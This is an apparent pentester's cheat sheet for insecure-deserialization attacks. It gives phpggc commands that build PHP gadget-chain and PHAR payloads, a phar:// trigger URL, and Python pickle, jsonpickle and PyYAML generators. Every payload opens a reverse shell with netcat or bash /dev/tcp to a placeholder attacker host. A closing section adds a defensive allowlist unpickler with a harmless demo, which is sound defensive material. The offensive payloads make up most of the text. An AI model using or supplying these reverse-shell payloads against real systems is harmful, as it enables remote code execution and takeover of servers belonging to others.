List the available gadget chains.
phpggc -l
phpggc -l <framework>
Generate a payload using a specific gadget chain.
phpggc <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -b
phpggc <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
Generate a PHAR file using a specific gadget chain.
phpggc -p phar <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -o file.phar
phpggc -p phar <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
Normal file access versus the same parameter pointing at the uploaded PHAR through the phar:// stream wrapper, which triggers the deserialization.
http://example.com/?file=uploads/file.txt
http://example.com/?file=phar://uploads/file.phar
Generate a Python pickle payload (base64-encoded).
import base64, pickle, os

class RCE:
    def __reduce__(self):
        # (callable, args) tuple: os.system runs when the pickle is loaded
        payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
        return os.system, (payload,)

print(base64.b64encode(pickle.dumps(RCE())).decode())
Generate a jsonpickle payload.
import jsonpickle, os

class RCE:
    def __reduce__(self):
        # same reduce tuple, serialized to jsonpickle's JSON format
        payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
        return os.system, (payload,)

print(jsonpickle.encode(RCE()))
Generate a PyYAML payload.
import yaml, subprocess

class RCE:
    def __reduce__(self):
        # must return (callable, args); returning a Popen object would run the
        # command at dump time and fail to serialize
        return subprocess.Popen, (["nc", "-nv", "<attacker-IP-address>", "<listen-port>", "-e", "/bin/bash"],)

print(yaml.dump(RCE()))
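Defensive counterpart to the pickle payloads above, added here as example code that is not part of the original notes: an unpickler that resolves only allowlisted globals, so a __reduce__ chain pointing at os.system is rejected before it runs. The SAFE_GLOBALS allowlist and the HarmlessRCE class (same shape as the payload class, harmless command) are constructed for the demo.

```python
import io
import os
import pickle

# Only these (module, name) pairs may be resolved while unpickling.
# Anything else, including os/posix.system or subprocess.Popen, is refused.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves allowlisted globals (pattern from the pickle docs)."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"forbidden global during unpickling: {module}.{name}"
        )


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class HarmlessRCE:
    """Constructed stand-in for the page's payload class with a harmless command."""

    def __reduce__(self):
        return os.system, ("echo deserialized",)


def demo():
    """Load a benign pickle and a reduce-based one; report what the allowlist did."""
    benign = pickle.dumps({"user": "alice", "roles": ["admin"]})
    malicious = pickle.dumps(HarmlessRCE())  # dumping does not execute anything
    results = {"benign": restricted_loads(benign)}
    try:
        restricted_loads(malicious)  # plain pickle.loads() would run the command here
        results["malicious_blocked"] = False
    except pickle.UnpicklingError:
        results["malicious_blocked"] = True
    return results


if __name__ == "__main__":
    print(demo())
```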